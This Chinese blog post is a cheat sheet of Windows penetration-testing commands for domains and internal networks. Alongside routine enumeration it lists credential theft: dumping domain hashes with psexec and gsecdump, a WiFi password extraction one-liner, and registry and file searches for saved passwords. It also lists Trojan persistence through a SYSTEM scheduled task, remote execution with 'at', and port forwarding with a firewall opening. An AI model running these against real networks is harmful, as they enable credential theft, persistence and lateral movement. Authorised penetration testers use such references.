Windows内网渗透命令

一、域常用操作命令

  1. 用户组相关
    • net group /domain:获得所有域用户组列表
    • net group qq_group /domain:显示域中qq_group组的成员等操作(包括添加、删除成员及组本身)
    • net group "domain admins"net group "enterprise admins"等:分别获得域管理员、企业管理员等列表
  2. 用户相关
    • net user /domain:获得所有域用户列表及指定账户详细信息
    • net user someuser /domain:获得指定账户详细信息
    • net user /domain bk bk123:修改域内用户密码(需管理员权限)
  3. 其他信息获取
    • net accounts /domain:获得域密码策略设置
    • nei view /domainnet view /domain:testdomain:查询域及域中计算机列表
    • nltest /domain_trusts:获取域信任信息
    • net config Workstation:查询机器属于哪个域
    • net time /domian:查询主域服务器的时间
    • echo %logonserver%:查看登陆到这台服务器的计算机名
    • net time \192.168.1.1:查询远程共享主机时间
    • net use \IP\ipc$ password /user:username@domain:ipc$ 域内连接
    • net view \http://dc2.backlion.com:查看域控共享情况
    • dir \http://dc2.backlion.com\SYSVOL /s /a > sysvol.txt:列出 sysvol 日志记录
    • xcopy \http://dc2.backlion.com\sysvol.txt sysvol.txt /i /e /c:远程拷贝到本地 sysvol 日志
    • mstsc /admin:远程桌面登录到 console 会话解决 hash 无法抓出问题
    • gpupdate/force:更新域策略
    • psexec \192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u:从域服务器密码存储文件导出 hash 值
    • gsecdump -a:获取域登管理员登录过得 hash 值

二、基本内网渗透命令

  1. 网络配置相关
    • ipconfig/allipconfig /releaseipconfig /renew:查看、释放、重新获取 IP 地址
    • ping hostname:显示机器名的 IP
    • netstat -anonetstat -an | find “3389”:查看开放端口及查找特定端口
    • net accounts:查看本地密码策略
    • nbtstat –A ip:netbiso 查询
    • net view:查看机器注释或活动状态机器列表(netbios 未禁用时)
    • echo %PROCESSOR_ARCHITECTURE%:查看系统是 32 还是 64 位
    • set:查看系统环境设置变量
  2. 用户及权限相关
    • whoamiwhoami/all:查询账号所属权限及查看 sid 值
    • net usernet localhroup administrators:查看本地组用户及本机管理员组用户
    • net session:查看当前会话
  3. 系统信息相关
    • systeminfo:查询系统以及补丁信息
    • tasklist /svctaskkill /imtaskkill /pid:查看进程、结束进程
    • wmic qfe get hotfixidwmic qfe list full /format:htable > hotfixes.htmwmic qfe:查看已安装补丁相关信息
  4. 共享及服务相关
    • net sharewmic share get name,path:查看 SMB 指向的路径(共享)
    • wmic nteventlog get path,filename,writeable:查询系统日志文件存储位置
    • net use \IP\ipc$ password /user:username:建立 IPC 会话(工作组模式)
    • net use z: \192.168.1.1:建立映射到本机 Z 盘
    • at \172.16.16.2 13:50 c:\windows\2009.exe:在共享主机上执行
    • net start:查看当前运行的服务
    • wmic service list briefwmic process list briefwmic startup list briefwmic product list brief:查看进程服务、进程、启动程序、安装程序和版本信息
    • wmic startup list full:识别开机启动的程序
    • wmic process where(description="mysqld.exe") >>mysql.log:获取软件安装路径
    • for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan showprofiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %jkey=clear:一键获取 wifi 密码
    • if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell):查看是否支持 posershell
    • qwinsta:查看登录情况
    • schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.ex e" /ED 2017/4/7:添加计划任务
    • REG query HKCU /v "pwd" /s:获取保存到注册表中的密码

三、内网网络结常用命令

  1. 网络路径相关
    • tracert IP:路由跟踪
    • route print:打印路由表
    • arp -a:列出本网段内所有活跃的IP地址
    • arp -sarp -d:绑定、解绑mac与ip地址
    • nbtscan -r 192.168.16.0/24:扫描整个网络
  2. 防火墙相关
    • netsh firewall show confignetsh firewall show state:查看防火墙策略
  3. 主机扫描相关
    • for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i"ttl":批量扫描内网存活主机

四、windows自带端口转发

  1. 配置相关
    • netsh interface ipv6 install:安装IPV6(部分系统必须)
    • netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22:设置端口转发
    • netsh interface portproxy show all:查看转发配置
    • netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22:删除配置
    • netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all:添加防火墙规则允许连接

五、敏感数据和目录

  1. 文件查找相关
    • dir /b/s config.*:查看所在目录所有config.为前缀的文件
    • findstr /si password.xml.ini *.txtfindstr /si login.xml.ini *.txt:查看后缀名文件中含有password、login关键字的文件

六、copy con创建命令

  1. 创建批处理和脚本
    • copy con ftp.bat:创建ftp.bat批处理
    • copy con test.vbs:创建test.vbs脚本

七、dsquery的AD查询工具

  1. 用户及相关信息查询
    • dsquery user domainroot -limit 65535 && net user /domain:列出域内所有用户名
    • dsquery server -domain http://super.com | dsget server -dnsname -site:搜索域内所有域控制器并显示DNS主机名和站点名称
    • dsquery contact:寻找目录中的联系人
    • dsquery subnet:列出域内网段划分
    • query user:查询那些用户在线
    • dsquery group && net group /domain:列出域内分组
    • dsquery ou:列出域内组织单位
    • dsquery server && net time /domain:列出域内域控制器
    • dsquery site -o rdn:搜索域中所有站点的名称
    • dsquery group dc=super,dc=com |more:搜索在DC=SUPER,DC=COM 域中的所有组
    • psloggedon.exe:查询那台主机和用户登录到该主机上
    • netsess.exe:远程主机上无需管理员权限,查询到主机名和用户
    • reg query "HKEY_CURRENT_USER\SOENSION_CLIENT\DEFAULT":获取最近mstsc登录的记录

八、DOS常用快捷命令

  1. 工具调用相关
    • mspaintcalcnotepadtaskmgroskgpedit.mscservices.msccompmgmt.mscdevmgmt.mscwinvermagnifyeventvwrRegeditresmonWMIC BIOS get releasedatemstsc -f:分别调用画图工具、计算器、记事本、任务管理器、屏幕键盘、组策略、本地服务、计算机管理、设备管理器、系统版本查看、放大镜、事件查看器、注册表、资源监视器、查看电脑生产日期、远程连接(全屏)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

打一年工搬一年砖

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值